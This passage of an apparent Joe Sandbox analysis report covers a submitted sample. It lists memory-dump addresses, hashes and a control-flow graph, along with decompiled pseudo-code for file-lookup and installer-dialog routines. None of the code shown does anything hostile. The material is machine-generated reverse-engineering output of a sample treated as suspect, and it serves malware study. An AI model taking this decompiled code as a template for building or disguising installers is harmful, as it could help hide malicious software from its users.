                                                0x00000000
                                                0x00000000
                                                0x0040733e
                                                0x0040733e
                                                0x00407342
                                                0x0040747a
                                                0x00000000
                                                0x0040747a
                                                0x00407348
                                                0x0040734b
                                                0x0040734e
                                                0x00407352
                                                0x00407355
                                                0x0040735b
                                                0x0040735d
                                                0x0040735d
                                                0x0040735d
                                                0x00407360
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00407366
                                                0x00407366
                                                0x0040736a
                                                0x004073ca
                                                0x004073cd
                                                0x004073d2
                                                0x004073d3
                                                0x004073d5
                                                0x004073d7
                                                0x004073da
                                                0x00000000
                                                0x004073da
                                                0x0040736c
                                                0x00407372
                                                0x00407375
                                                0x00407378
                                                0x0040737b
                                                0x0040737e
                                                0x00407381
                                                0x00407384
                                                0x00407387
                                                0x0040738a
                                                0x0040738d
                                                0x004073a6
                                                0x004073a9
                                                0x004073ac
                                                0x004073af
                                                0x004073b3
                                                0x004073b5
                                                0x004073b5
                                                0x004073b6
                                                0x004073b9
                                                0x0040738f
                                                0x0040738f
                                                0x00407397
                                                0x0040739c
                                                0x0040739e
                                                0x004073a1
                                                0x004073a1
                                                0x004073bc
                                                0x004073c3
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x00407061
                                                0x00407064
                                                0x0040709a
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071cd
                                                0x004071cd
                                                0x004071d0
                                                0x004071d2
                                                0x0040745c
                                                0x00000000
                                                0x0040745c
                                                0x004071d8
                                                0x004071db
                                                0x00000000
                                                0x00000000
                                                0x004071e1
                                                0x004071e5
                                                0x004071e8
                                                0x004071e8
                                                0x004071e8
                                                0x00000000
                                                0x004071e8
                                                0x00407066
                                                0x00407068
                                                0x0040706a
                                                0x0040706c
                                                0x0040706f
                                                0x00407070
                                                0x00407072
                                                0x00407074
                                                0x00407077
                                                0x0040707a
                                                0x00407090
                                                0x00407095
                                                0x004070cd
                                                0x004070cd
                                                0x004070d1
                                                0x004070fd
                                                0x004070ff
                                                0x00407106
                                                0x00407109
                                                0x0040710c
                                                0x0040710c
                                                0x00407111
                                                0x00407111
                                                0x00407113
                                                0x00407116
                                                0x0040711d
                                                0x00407120
                                                0x0040714d
                                                0x0040714d
                                                0x00407150
                                                0x00407153
                                                0x004071c7
                                                0x004071c7
                                                0x004071c7
                                                0x00000000
                                                0x004071c7
                                                0x00407155
                                                0x0040715b
                                                0x0040715e
                                                0x00407161
                                                0x00407164
                                                0x00407167
                                                0x0040716a
                                                0x0040716d
                                                0x00407170
                                                0x00407173
                                                0x00407176
                                                0x0040718f
                                                0x00407191
                                                0x00407194
                                                0x00407195
                                                0x00407198
                                                0x0040719a
                                                0x0040719d
                                                0x0040719f
                                                0x004071a1
                                                0x004071a4
                                                0x004071a6
                                                0x004071a9
                                                0x004071ad
                                                0x004071af
                                                0x004071af
                                                0x004071b0
                                                0x004071b3
                                                0x004071b6
                                                0x00407178
                                                0x00407178
                                                0x00407180
                                                0x00407185
                                                0x00407187
                                                0x0040718a
                                                0x0040718a
                                                0x004071b9
                                                0x004071c0
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x00000000
                                                0x004071c2
                                                0x00000000
                                                0x004071c2
                                                0x004071c0
                                                0x004070d3
                                                0x004070d6
                                                0x004070d8
                                                0x004070db
                                                0x004070de
                                                0x004070e1
                                                0x004070e3
                                                0x004070e6
                                                0x004070e9
                                                0x004070e9
                                                0x004070ec
                                                0x004070ec
                                                0x004070ef
                                                0x004070f6
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x00000000
                                                0x004070f8
                                                0x00000000
                                                0x004070f8
                                                0x004070f6
                                                0x0040707c
                                                0x0040707f
                                                0x00407081
                                                0x00407084
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f6e
                                                0x00406f6e
                                                0x00406f72
                                                0x00407438
                                                0x00000000
                                                0x00407438
                                                0x00406f78
                                                0x00406f7b
                                                0x00406f7e
                                                0x00406f81
                                                0x00406f83
                                                0x00406f83
                                                0x00406f83
                                                0x00406f86
                                                0x00406f89
                                                0x00406f8c
                                                0x00406f8f
                                                0x00406f92
                                                0x00406f95
                                                0x00406f96
                                                0x00406f98
                                                0x00406f98
                                                0x00406f98
                                                0x00406f9b
                                                0x00406f9e
                                                0x00406fa1
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa7
                                                0x00000000
                                                0x00000000
                                                0x004071eb
                                                0x004071eb
                                                0x004071eb
                                                0x004071ef
                                                0x00000000
                                                0x00000000
                                                0x004071f5
                                                0x004071f8
                                                0x004071fb
                                                0x004071fe
                                                0x00407200
                                                0x00407200
                                                0x00407200
                                                0x00407203
                                                0x00407206
                                                0x00407209
                                                0x0040720c
                                                0x0040720f
                                                0x00407212
                                                0x00407213
                                                0x00407215
                                                0x00407215
                                                0x00407215
                                                0x00407218
                                                0x0040721b
                                                0x0040721e
                                                0x00407221
                                                0x00407224
                                                0x00407228
                                                0x0040722a
                                                0x0040722d
                                                0x00000000
                                                0x0040722f
                                                0x00000000
                                                0x0040722f
                                                0x0040722d
                                                0x00407462
                                                0x00000000
                                                0x00000000
                                                0x00406a91

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                                                • Instruction ID: 53db679fe0595a89c24929100efc96b5d5a2697a31689bd0580b70dbb8294089
                                                • Opcode Fuzzy Hash: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                                                • Instruction Fuzzy Hash: 55F17770D04269CBDF18CFA8C8946ADBBB0FF44305F25816ED856BB281D7786A86CF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040683D(WCHAR* _a4) {
                                                				void* _t2;
                                                
                                                				_t2 = FindFirstFileW(_a4, 0x426758); // executed
                                                				if(_t2 == 0xffffffff) {
                                                					return 0;
                                                				}
                                                				FindClose(_t2);
                                                				return 0x426758;
                                                			}




                                                0x00406848
                                                0x00406851
                                                0x00000000
                                                0x0040685e
                                                0x00406854
                                                0x00000000

                                                APIs
                                                • FindFirstFileW.KERNELBASE(76CDFAA0,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\), ref: 00406848
                                                • FindClose.KERNEL32(00000000), ref: 00406854
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID: XgB
                                                • API String ID: 2295610775-796949446
                                                • Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                • Instruction ID: 6b6802a92a84c0d1895eb5c997cd82d97c30a63e480feb254935e86212d72bfe
                                                • Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                • Instruction Fuzzy Hash: 4AD0C9325051205BC2402638AF0C84B6B9A9F563313228A36B5A6E11A0C6348C3286AC
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 41%
                                                			E0040290B(short __ebx, short* __edi) {
                                                				void* _t8;
                                                				void* _t21;
                                                
                                                				_t8 = FindFirstFileW(E00402DA6(2), _t21 - 0x2dc); // executed
                                                				if(_t8 != 0xffffffff) {
                                                					E0040644E( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                					_push(_t21 - 0x2b0);
                                                					_push(__edi);
                                                					E00406507();
                                                				} else {
                                                					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                					 *__edi = __ebx;
                                                					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                				}
                                                				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t21 - 4));
                                                				return 0;
                                                			}





                                                0x0040291a
                                                0x00402923
                                                0x0040293e
                                                0x00402949
                                                0x0040294a
                                                0x00402a94
                                                0x00402925
                                                0x00402928
                                                0x0040292b
                                                0x0040292e
                                                0x0040292e
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: 8b7112dacf42823d7a0a51554599ee8fcdfbe73af1dc861e8dae23c867b5cefb
                                                • Instruction ID: 26775ad4c1080374fb75430f90045566014d5e2c4dab898babe53efe7e17598a
                                                • Opcode Fuzzy Hash: 8b7112dacf42823d7a0a51554599ee8fcdfbe73af1dc861e8dae23c867b5cefb
                                                • Instruction Fuzzy Hash: F3F08271A04104EFD701DBA4DD49AAEB378FF14314F60417BE101F21D0E7B88E129B2A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 194 403f64-403f76 195 403f7c-403f82 194->195 196 4040dd-4040ec 194->196 195->196 197 403f88-403f91 195->197 198 40413b-404150 196->198 199 4040ee-404129 GetDlgItem * 2 call 404463 KiUserCallbackDispatcher call 40140b 196->199 200 403f93-403fa0 SetWindowPos 197->200 201 403fa6-403fad 197->201 203 404190-404195 call 4044af 198->203 204 404152-404155 198->204 225 40412e-404136 199->225 200->201 206 403ff1-403ff7 201->206 207 403faf-403fc9 ShowWindow 201->207 212 40419a-4041b5 203->212 209 404157-404162 call 401389 204->209 210 404188-40418a 204->210 215 404010-404013 206->215 216 403ff9-40400b DestroyWindow 206->216 213 4040ca-4040d8 call 4044ca 207->213 214 403fcf-403fe2 GetWindowLongW 207->214 209->210 229 404164-404183 SendMessageW 209->229 210->203 211 404430 210->211 223 404432-404439 211->223 220 4041b7-4041b9 call 40140b 212->220 221 4041be-4041c4 212->221 213->223 214->213 222 403fe8-403feb ShowWindow 214->222 226 404015-404021 SetWindowLongW 215->226 227 404026-40402c 215->227 224 40440d-404413 216->224 220->221 233 4041ca-4041d5 221->233 234 4043ee-404407 DestroyWindow EndDialog 221->234 222->206 224->211 232 404415-40441b 224->232 225->198 226->223 227->213 235 404032-404041 GetDlgItem 227->235 229->223 232->211 236 40441d-404426 ShowWindow 232->236 233->234 237 4041db-404228 call 406544 call 404463 * 3 GetDlgItem 233->237 234->224 238 404060-404063 235->238 239 404043-40405a SendMessageW IsWindowEnabled 235->239 236->211 266 404232-40426e ShowWindow KiUserCallbackDispatcher call 404485 EnableWindow 237->266 267 40422a-40422f 237->267 240 404065-404066 238->240 241 404068-40406b 238->241 239->211 239->238 243 404096-40409b call 40443c 240->243 244 404079-40407e 241->244 245 40406d-404073 241->245 243->213 247 4040b4-4040c4 SendMessageW 244->247 249 404080-404086 244->249 245->247 248 404075-404077 245->248 247->213 248->243 252 404088-40408e call 40140b 249->252 253 40409d-4040a6 call 40140b 249->253 264 404094 252->264 253->213 262 4040a8-4040b2 253->262 262->264 264->243 270 404270-404271 266->270 271 404273 266->271 267->266 272 404275-4042a3 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042a5-4042b6 SendMessageW 272->273 274 4042b8 272->274 275 4042be-4042fd call 404498 call 403f45 call 406507 lstrlenW call 406544 SetWindowTextW call 401389 273->275 274->275 275->212 286 404303-404305 275->286 286->212 287 40430b-40430f 286->287 288 404311-404317 287->288 289 40432e-404342 DestroyWindow 287->289 288->211 290 40431d-404323 288->290 289->224 291 404348-404375 CreateDialogParamW 289->291 290->212 292 404329 290->292 291->224 293 40437b-4043d2 call 404463 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->211 293->211 298 4043d4-4043e7 ShowWindow call 4044af 293->298 300 4043ec 298->300 300->224
                                                C-Code - Quality: 86%
                                                			E00403F64(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                				struct HWND__* _v28;
                                                				void* _v80;
                                                				void* _v84;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t34;
                                                				signed int _t36;
                                                				signed int _t38;
                                                				struct HWND__* _t48;
                                                				signed int _t67;
                                                				struct HWND__* _t73;
                                                				signed int _t86;
                                                				struct HWND__* _t91;
                                                				signed int _t99;
                                                				int _t103;
                                                				signed int _t117;
                                                				int _t118;
                                                				int _t122;
                                                				signed int _t124;
                                                				struct HWND__* _t127;
                                                				struct HWND__* _t128;
                                                				int _t129;
                                                				intOrPtr _t130;
                                                				long _t133;
                                                				int _t135;
                                                				int _t136;
                                                				void* _t137;
                                                				void* _t145;
                                                
                                                				_t130 = _a8;
                                                				if(_t130 == 0x110 || _t130 == 0x408) {
                                                					_t34 = _a12;
                                                					_t127 = _a4;
                                                					__eflags = _t130 - 0x110;
                                                					 *0x4236f0 = _t34;
                                                					if(_t130 == 0x110) {
                                                						 *0x42a228 = _t127;
                                                						 *0x423704 = GetDlgItem(_t127, 1);
                                                						_t91 = GetDlgItem(_t127, 2);
                                                						_push(0xffffffff);
                                                						_push(0x1c);
                                                						 *0x4216d0 = _t91;
                                                						E00404463(_t127);
                                                						SetClassLongW(_t127, 0xfffffff2,  *0x429208); // executed
                                                						 *0x4291ec = E0040140B(4);
                                                						_t34 = 1;
                                                						__eflags = 1;
                                                						 *0x4236f0 = 1;
                                                					}
                                                					_t124 =  *0x40a368; // 0x2
                                                					_t136 = 0;
                                                					_t133 = (_t124 << 6) +  *0x42a240;
                                                					__eflags = _t124;
                                                					if(_t124 < 0) {
                                                						L36:
                                                						E004044AF(0x40b);
                                                						while(1) {
                                                							_t36 =  *0x4236f0;
                                                							 *0x40a368 =  *0x40a368 + _t36;
                                                							_t133 = _t133 + (_t36 << 6);
                                                							_t38 =  *0x40a368; // 0x2
                                                							__eflags = _t38 -  *0x42a244;
                                                							if(_t38 ==  *0x42a244) {
                                                								E0040140B(1);
                                                							}
                                                							__eflags =  *0x4291ec - _t136;
                                                							if( *0x4291ec != _t136) {
                                                								break;
                                                							}
                                                							__eflags =  *0x40a368 -  *0x42a244; // 0x2
                                                							if(__eflags >= 0) {
                                                								break;
                                                							}
                                                							_t117 =  *(_t133 + 0x14);
                                                							E00406544(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                                                							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                							_push(0xfffffc19);
                                                							E00404463(_t127);
                                                							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                							_push(0xfffffc1b);
                                                							E00404463(_t127);
                                                							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                							_push(0xfffffc1a);
                                                							E00404463(_t127);
                                                							_t48 = GetDlgItem(_t127, 3);
                                                							__eflags =  *0x42a2ac - _t136;
                                                							_v28 = _t48;
                                                							if( *0x42a2ac != _t136) {
                                                								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                								__eflags = _t117;
                                                							}
                                                							ShowWindow(_t48, _t117 & 0x00000008); // executed
                                                							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                                                							E00404485(_t117 & 0x00000002);
                                                							_t118 = _t117 & 0x00000004;
                                                							EnableWindow( *0x4216d0, _t118);
                                                							__eflags = _t118 - _t136;
                                                							if(_t118 == _t136) {
                                                								_push(1);
                                                							} else {
                                                								_push(_t136);
                                                							}
                                                							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                							__eflags =  *0x42a2ac - _t136;
                                                							if( *0x42a2ac == _t136) {
                                                								_push( *0x423704);
                                                							} else {
                                                								SendMessageW(_t127, 0x401, 2, _t136);
                                                								_push( *0x4216d0);
                                                							}
                                                							E00404498();
                                                							E00406507(0x423708, E00403F45());
                                                							E00406544(0x423708, _t127, _t133,  &(0x423708[lstrlenW(0x423708)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                							SetWindowTextW(_t127, 0x423708); // executed
                                                							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
                                                							__eflags = _t67;
                                                							if(_t67 != 0) {
                                                								continue;
                                                							} else {
                                                								__eflags =  *_t133 - _t136;
                                                								if( *_t133 == _t136) {
                                                									continue;
                                                								}
                                                								__eflags =  *(_t133 + 4) - 5;
                                                								if( *(_t133 + 4) != 5) {
                                                									DestroyWindow( *0x4291f8); // executed
                                                									 *0x4226e0 = _t133;
                                                									__eflags =  *_t133 - _t136;
                                                									if( *_t133 <= _t136) {
                                                										goto L60;
                                                									}
                                                									_t73 = CreateDialogParamW( *0x42a220,  *_t133 +  *0x429200 & 0x0000ffff, _t127,  *(0x40a36c +  *(_t133 + 4) * 4), _t133); // executed
                                                									__eflags = _t73 - _t136;
                                                									 *0x4291f8 = _t73;
                                                									if(_t73 == _t136) {
                                                										goto L60;
                                                									}
                                                									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                									_push(6);
                                                									E00404463(_t73);
                                                									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                									ScreenToClient(_t127, _t137 + 0x10);
                                                									SetWindowPos( *0x4291f8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
                                                									__eflags =  *0x4291ec - _t136;
                                                									if( *0x4291ec != _t136) {
                                                										goto L63;
                                                									}
                                                									ShowWindow( *0x4291f8, 8); // executed
                                                									E004044AF(0x405);
                                                									goto L60;
                                                								}
                                                								__eflags =  *0x42a2ac - _t136;
                                                								if( *0x42a2ac != _t136) {
                                                									goto L63;
                                                								}
                                                								__eflags =  *0x42a2a0 - _t136;
                                                								if( *0x42a2a0 != _t136) {
                                                									continue;
                                                								}
                                                								goto L63;
                                                							}
                                                						}
                                                						DestroyWindow( *0x4291f8);
                                                						 *0x42a228 = _t136;
                                                						EndDialog(_t127,  *0x421ed8);
                                                						goto L60;
                                                					} else {
                                                						__eflags = _t34 - 1;
                                                						if(_t34 != 1) {
                                                							L35:
                                                							__eflags =  *_t133 - _t136;
                                                							if( *_t133 == _t136) {
                                                								goto L63;
                                                							}
                                                							goto L36;
                                                						}
                                                						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
                                                						__eflags = _t86;
                                                						if(_t86 == 0) {
                                                							goto L35;
                                                						}
                                                						SendMessageW( *0x4291f8, 0x40f, 0, 1);
                                                						__eflags =  *0x4291ec;
                                                						return 0 |  *0x4291ec == 0x00000000;
                                                					}
                                                				} else {
                                                					_t127 = _a4;
                                                					_t136 = 0;
                                                					if(_t130 == 0x47) {
                                                						SetWindowPos( *0x4236e8, _t127, 0, 0, 0, 0, 0x13);
                                                					}
                                                					_t122 = _a12;
                                                					if(_t130 != 5) {
                                                						L8:
                                                						if(_t130 != 0x40d) {
                                                							__eflags = _t130 - 0x11;
                                                							if(_t130 != 0x11) {
                                                								__eflags = _t130 - 0x111;
                                                								if(_t130 != 0x111) {
                                                									goto L28;
                                                								}
                                                								_t135 = _t122 & 0x0000ffff;
                                                								_t128 = GetDlgItem(_t127, _t135);
                                                								__eflags = _t128 - _t136;
                                                								if(_t128 == _t136) {
                                                									L15:
                                                									__eflags = _t135 - 1;
                                                									if(_t135 != 1) {
                                                										__eflags = _t135 - 3;
                                                										if(_t135 != 3) {
                                                											_t129 = 2;
                                                											__eflags = _t135 - _t129;
                                                											if(_t135 != _t129) {
                                                												L27:
                                                												SendMessageW( *0x4291f8, 0x111, _t122, _a16);
                                                												goto L28;
                                                											}
                                                											__eflags =  *0x42a2ac - _t136;
                                                											if( *0x42a2ac == _t136) {
                                                												_t99 = E0040140B(3);
                                                												__eflags = _t99;
                                                												if(_t99 != 0) {
                                                													goto L28;
                                                												}
                                                												 *0x421ed8 = 1;
                                                												L23:
                                                												_push(0x78);
                                                												L24:
                                                												E0040443C();
                                                												goto L28;
                                                											}
                                                											E0040140B(_t129);
                                                											 *0x421ed8 = _t129;
                                                											goto L23;
                                                										}
                                                										__eflags =  *0x40a368 - _t136; // 0x2
                                                										if(__eflags <= 0) {
                                                											goto L27;
                                                										}
                                                										_push(0xffffffff);
                                                										goto L24;
                                                									}
                                                									_push(_t135);
                                                									goto L24;
                                                								}
                                                								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                								_t103 = IsWindowEnabled(_t128);
                                                								__eflags = _t103;
                                                								if(_t103 == 0) {
                                                									L63:
                                                									return 0;
                                                								}
                                                								goto L15;
                                                							}
                                                							SetWindowLongW(_t127, _t136, _t136);
                                                							return 1;
                                                						}
                                                						DestroyWindow( *0x4291f8);
                                                						 *0x4291f8 = _t122;
                                                						L60:
                                                						_t145 =  *0x425708 - _t136; // 0x1
                                                						if(_t145 == 0 &&  *0x4291f8 != _t136) {
                                                							ShowWindow(_t127, 0xa); // executed
                                                							 *0x425708 = 1;
                                                						}
                                                						goto L63;
                                                					} else {
                                                						asm("sbb eax, eax");
                                                						ShowWindow( *0x4236e8,  ~(_t122 - 1) & 0x00000005);
                                                						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                							L28:
                                                							return E004044CA(_a8, _t122, _a16);
                                                						} else {
                                                							ShowWindow(_t127, 4);
                                                							goto L8;
                                                						}
                                                					}
                                                				}
                                                			}
































                                                0x00403f6f
                                                0x00403f76
                                                0x004040dd
                                                0x004040e1
                                                0x004040e5
                                                0x004040e7
                                                0x004040ec
                                                0x004040f7
                                                0x00404102
                                                0x00404107
                                                0x00404109
                                                0x0040410b
                                                0x0040410e
                                                0x00404113
                                                0x00404121
                                                0x0040412e
                                                0x00404135
                                                0x00404135
                                                0x00404136
                                                0x00404136
                                                0x0040413b
                                                0x00404141
                                                0x00404148
                                                0x0040414e
                                                0x00404150
                                                0x00404190
                                                0x00404195
                                                0x0040419a
                                                0x0040419a
                                                0x0040419f
                                                0x004041a8
                                                0x004041aa
                                                0x004041af
                                                0x004041b5
                                                0x004041b9
                                                0x004041b9
                                                0x004041be
                                                0x004041c4
                                                0x00000000
                                                0x00000000
                                                0x004041cf
                                                0x004041d5
                                                0x00000000
                                                0x00000000
                                                0x004041de
                                                0x004041e6
                                                0x004041eb
                                                0x004041ee
                                                0x004041f4
                                                0x004041f9
                                                0x004041fc
                                                0x00404202
                                                0x00404207
                                                0x0040420a
                                                0x00404210
                                                0x00404218
                                                0x0040421e
                                                0x00404224
                                                0x00404228
                                                0x0040422f
                                                0x0040422f
                                                0x0040422f
                                                0x00404239
                                                0x0040424b
                                                0x00404257
                                                0x0040425c
                                                0x00404266
                                                0x0040426c
                                                0x0040426e
                                                0x00404273
                                                0x00404270
                                                0x00404270
                                                0x00404270
                                                0x00404283
                                                0x0040429b
                                                0x0040429d
                                                0x004042a3
                                                0x004042b8
                                                0x004042a5
                                                0x004042ae
                                                0x004042b0
                                                0x004042b0
                                                0x004042be
                                                0x004042cf
                                                0x004042e5
                                                0x004042ec
                                                0x004042f6
                                                0x004042fb
                                                0x004042fd
                                                0x00000000
                                                0x00404303
                                                0x00404303
                                                0x00404305
                                                0x00000000
                                                0x00000000
                                                0x0040430b
                                                0x0040430f
                                                0x00404334
                                                0x0040433a
                                                0x00404340
                                                0x00404342
                                                0x00000000
                                                0x00000000
                                                0x00404368
                                                0x0040436e
                                                0x00404370
                                                0x00404375
                                                0x00000000
                                                0x00000000
                                                0x0040437b
                                                0x0040437e
                                                0x00404381
                                                0x00404398
                                                0x004043a4
                                                0x004043bd
                                                0x004043c7
                                                0x004043cc
                                                0x004043d2
                                                0x00000000
                                                0x00000000
                                                0x004043dc
                                                0x004043e7
                                                0x00000000
                                                0x004043e7
                                                0x00404311
                                                0x00404317
                                                0x00000000
                                                0x00000000
                                                0x0040431d
                                                0x00404323
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404329
                                                0x004042fd
                                                0x004043f4
                                                0x00404400
                                                0x00404407
                                                0x00000000
                                                0x00404152
                                                0x00404152
                                                0x00404155
                                                0x00404188
                                                0x00404188
                                                0x0040418a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040418a
                                                0x0040415b
                                                0x00404160
                                                0x00404162
                                                0x00000000
                                                0x00000000
                                                0x00404172
                                                0x0040417a
                                                0x00000000
                                                0x00404180
                                                0x00403f88
                                                0x00403f88
                                                0x00403f8c
                                                0x00403f91
                                                0x00403fa0
                                                0x00403fa0
                                                0x00403fa6
                                                0x00403fad
                                                0x00403ff1
                                                0x00403ff7
                                                0x00404010
                                                0x00404013
                                                0x00404026
                                                0x0040402c
                                                0x00000000
                                                0x00000000
                                                0x00404032
                                                0x0040403d
                                                0x0040403f
                                                0x00404041
                                                0x00404060
                                                0x00404060
                                                0x00404063
                                                0x00404068
                                                0x0040406b
                                                0x0040407b
                                                0x0040407c
                                                0x0040407e
                                                0x004040b4
                                                0x004040c4
                                                0x00000000
                                                0x004040c4
                                                0x00404080
                                                0x00404086
                                                0x0040409f
                                                0x004040a4
                                                0x004040a6
                                                0x00000000
                                                0x00000000
                                                0x004040a8
                                                0x00404094
                                                0x00404094
                                                0x00404096
                                                0x00404096
                                                0x00000000
                                                0x00404096
                                                0x00404089
                                                0x0040408e
                                                0x00000000
                                                0x0040408e
                                                0x0040406d
                                                0x00404073
                                                0x00000000
                                                0x00000000
                                                0x00404075
                                                0x00000000
                                                0x00404075
                                                0x00404065
                                                0x00000000
                                                0x00404065
                                                0x0040404b
                                                0x00404052
                                                0x00404058
                                                0x0040405a
                                                0x00404430
                                                0x00000000
                                                0x00404430
                                                0x00000000
                                                0x0040405a
                                                0x00404018
                                                0x00000000
                                                0x00404020
                                                0x00403fff
                                                0x00404005
                                                0x0040440d
                                                0x0040440d
                                                0x00404413
                                                0x00404420
                                                0x00404426
                                                0x00404426
                                                0x00000000
                                                0x00403faf
                                                0x00403fb4
                                                0x00403fc0
                                                0x00403fc9
                                                0x004040ca
                                                0x00000000
                                                0x00403fe8
                                                0x00403feb
                                                0x00000000
                                                0x00403feb
                                                0x00403fc9
                                                0x00403fad

                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
                                                • ShowWindow.USER32(?), ref: 00403FC0
